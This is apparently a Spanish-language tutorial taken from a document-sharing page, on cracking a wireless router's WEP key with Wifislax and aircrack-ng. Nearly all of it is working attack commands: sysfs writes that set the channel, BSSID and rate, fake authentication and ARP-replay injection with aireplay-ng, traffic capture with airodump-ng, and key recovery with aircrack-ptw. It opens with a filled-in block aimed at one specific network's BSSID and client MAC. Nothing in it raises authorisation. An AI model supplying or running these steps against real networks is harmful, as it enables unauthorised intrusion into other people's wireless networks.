Está en la página 1de 3

chmod u+rwx /sys/class/net/wifi0/device/rate

echo 12 > /sys/class/net/wifi0/device/rate


echo 6 > /sys/class/net/wifi0/device/channel
echo 00:01:38:97:d7:06 > /sys/class/net/wifi0/device/bssid
airodump-ng rtap0
aireplay-ng -1 0 -e WLAN_28 -a 00:01:38:97:d7:06 -h 00:18:de:6d:97:8e wifi0
aireplay-ng -3 -b 00:01:38:97:d7:06 -h 00:18:de:6d:97:8e wifi0
airodump-ng rtap0
Instrucciones
- Para usarlo como LiveCD solo hay que grabar la imagen .iso en un cd virgen.
- Para usarlo como LiveUSB hay que seguir estos pasos:
Tener un pendrive de como mínimo 1 Gb formateado en FAT32.
Montar la imagen wifislax_3-1_LiveUSB+Atheros.iso en una unidad virtual tipo Dae
mon Tools o descomprimirla usando 7zip, Winrar, etc...
Copiar el contenido de wifislax_3-1_LiveUSB+Atheros.iso dentro del pendrive
Una vez copiados, acceder al pendrive y abrir la carpeta boot, donde hay que eje
cutar:
Si se hace desde Linux hay que ejecutar bootinst.sh en la consola
Si se hace desde Windows hay que ejecutar el archivo bootinst.bat
Reiniciar la máquina configurando la BIOS para que se inicie desde el pendrive o f
orzando el selector de dispositivo de arranque.

PASOS
Abrimos una consola
Código:
kwrite /sys/class/net/wifi0/device/channel
Importante: El canal AP debe corresponder al mismo canal del router que queremos
atacar, eso lo podeis ver cuando ejecutáis vuestro sistema operativo y buscais re
des wifi.
Canal de AP si pones 11 (11 es un ejemplo) normalmente muestra algunos puntos de
acceso cuando ejecutes airodump, guardamos y cerramos. Los canales oscilan de 1
a 13 aunque en algunas ocasiones he visto mas de 13.
Cogemos el BSSID del AP (router)
Código:
airodump-ng wifi0
Una vez aparezcan los BSSID pulsamos CTRL+C (para parar el proceso)
Código:
kwrite /sys/class/net/wifi0/device/bssid
Ponemos el BSSID del AP y guardamos pero no cerramos el archivo por lo visto hay
incompatibilidades si cerramos.
Código:
airodump-ng -c CANAL DEL AP -w DATOS wifi0
Abrimos otra consola
Código:
kwrite /sys/class/net/wifi0/device/rate
Lo ponemos a 2, guardamos y cerramos.
Para ahorrarnos estos pasos os podeis DESCARGAR EL SIGUIENTE SCRIPT solo válido pa
ra la distribución de wifiway.
Para ejecutarlo poner en consola (shell) y seguir los pasos.
Código:
./ipw3945.sh

Seguimos con la inyección, levantamos la interfaz wifi


Código:
ifconfig wifi0 up

Cogemos la MAC de tu WIFI0. Los 12 primeros numeros de HWaddr cambiamos los " -
" por " : " (guiones por dos puntos)
Ejemplo: 12-58-47-FD-AD-8F-00-00-00-00 se cambia por 12:58:47:FD:AD:8F
Código:
ifconfig

Código:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
También podeis poner
Código:
aireplay-ng -1 10 -a BSSID -h MAC WIFI0 -e ESSID wifi0
de esta manera se asocia automáticamente cada 10 segundos para aquellos que pillai
s alguna ARP y luego no suben.
Una vez autentificados abrimos otra consola y ponemos
Código:
aireplay-ng -3 -b BSSID -h MAC WIFI0 wifi0
Esperamos un rato como mucho 15 minutos y veréis como suben los ARP.
El ataque utilizado es el AP1 de falsa autentificacion tambien funciona con el A
P0 pero no lo he probado.

Si os pilla alguna ARP pero no sube iros a la consola que tiene el AP1
Código:
aireplay-ng -1 0 -a BSSID -h MAC WIFI0 -e ESSID wifi0
Y lo ejecutáis de nuevo hasta que os autentifique o se os suban los ARP.
Si no autentifica fijaros que el RXQ (airodump-ng) se mantenga por encima del 50
% de no ser así los DATA no subirán rápido, normalmente es debido a que el ARP se encu
entra demasiado lejos.
Por ultimo cuando tengamos mas de 100.000 DATA en airodump-ng ejecutamos en otra
consola.
Código:
aircrack-ptw DATOS-01.cap
No es necesario parar los procesos para buscar la clave, puede seguir subiendo D
ATA por si acaso no encuentra la clave WEP y volver a intentarlo más adelante por
ejemplo con 150.000 DATA
Al cabo de un rato (un minuto como máximo) os saldrá KEY FOUND con la clave wep.
Salu2

También podría gustarte